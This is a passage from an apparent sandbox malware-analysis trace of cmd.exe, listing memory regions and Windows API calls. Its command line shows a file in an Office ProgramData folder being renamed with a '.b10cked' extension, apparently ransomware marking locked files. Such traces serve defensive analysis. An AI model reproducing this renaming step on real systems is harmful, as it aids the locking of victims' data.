"pagefile_0x000000007ffb0000" filename = "" Region: id = 21024 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 21025 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21076 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21077 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21078 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21079 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 21080 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 21081 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21082 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21083 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21084 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21085 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21086 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21087 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21088 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21089 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21090 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21091 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21092 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21093 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 21094 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 21095 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 21096 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 21097 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 21098 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21099 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x00000000011b0000" filename = "" Thread: id = 319 os_tid = 0xda8 [0154.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7b4 | out: lpSystemTimeAsFileTime=0x30f7b4*(dwLowDateTime=0x95d92e20, dwHighDateTime=0x1d440a9)) [0154.213] GetCurrentProcessId () returned 0x8ac [0154.213] GetCurrentThreadId () returned 0xda8 [0154.213] GetTickCount () returned 0x2f749 [0154.213] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7ac | out: lpPerformanceCount=0x30f7ac*=21100266309) returned 1 [0154.214] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0154.214] __set_app_type (_Type=0x1) [0154.214] __p__fmode () returned 0x76b331f4 [0154.214] __p__commode () returned 0x76b331fc [0154.214] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0154.215] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0154.215] GetCurrentThreadId () returned 0xda8 [0154.215] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda8) returned 0x38 [0154.215] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.215] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0154.215] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.215] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0154.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f744 | out: phkResult=0x30f744*=0x0) returned 0x2 [0154.215] VirtualQuery (in: lpAddress=0x30f77b, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: 
lpAddress=0x210000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.216] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0154.216] GetConsoleOutputCP () returned 0x1b5 [0154.216] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.216] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.216] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.216] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.217] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.217] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0154.217] GetEnvironmentStringsW () returned 0x4c0210* [0154.217] 
FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.217] GetEnvironmentStringsW () returned 0x4c0210* [0154.217] FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0xa0, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, 
lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegCloseKey (hKey=0x40) returned 0x0 [0154.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] 
RegCloseKey (hKey=0x40) returned 0x0 [0154.218] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0154.218] srand (_Seed=0x5b88637c) [0154.218] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" [0154.218] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" [0154.219] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.219] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0154.219] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0154.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0154.219] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0154.219] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0154.219] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0154.220] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0154.220] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0154.220] GetEnvironmentStringsW () returned 0x4c2360* [0154.220] FreeEnvironmentStringsW (penv=0x4c2360) returned 1 [0154.220] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.220] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.220] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0154.220] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0154.220] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0154.220] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0154.220] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0154.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f480, lpFilePart=0x30f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f47c*="Desktop") returned 0x18 [0154.220] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] 
FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.221] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0154.221] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0154.221] GetEnvironmentStringsW () returned 0x4c0210* [0154.222] FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.222] GetConsoleOutputCP () returned 0x1b5 [0154.222] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.222] GetUserDefaultLCID () returned 0x409 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="1") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0154.223] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0154.223] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0154.224] GetConsoleTitleW (in: lpConsoleTitle=0x4b0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0154.226] _wcsicmp (_String1="move", _String2=")") returned 68 [0154.226] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0154.226] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0154.226] _wcsicmp (_String1="IF", _String2="move") returned -4 [0154.226] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0154.226] _wcsicmp (_String1="REM", _String2="move") returned 5 [0154.226] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0154.230] GetConsoleTitleW (in: lpConsoleTitle=0x30f2b8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.263] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0154.263] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0154.263] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="CD") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="REN") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0154.263] _wcsicmp (_String1="move", _String2="SET") returned -6 [0154.263] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0154.263] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="MD") returned 11 [0154.263] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0154.263] _wcsicmp (_String1="move", _String2="RD") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0154.263] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0154.263] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0154.264] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0154.264] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="VER") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0154.264] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0154.264] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0154.264] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0154.264] _wcsicmp (_String1="move", _String2="START") returned -6 [0154.264] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0154.264] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0154.264] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0154.266] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.266] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.266] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp 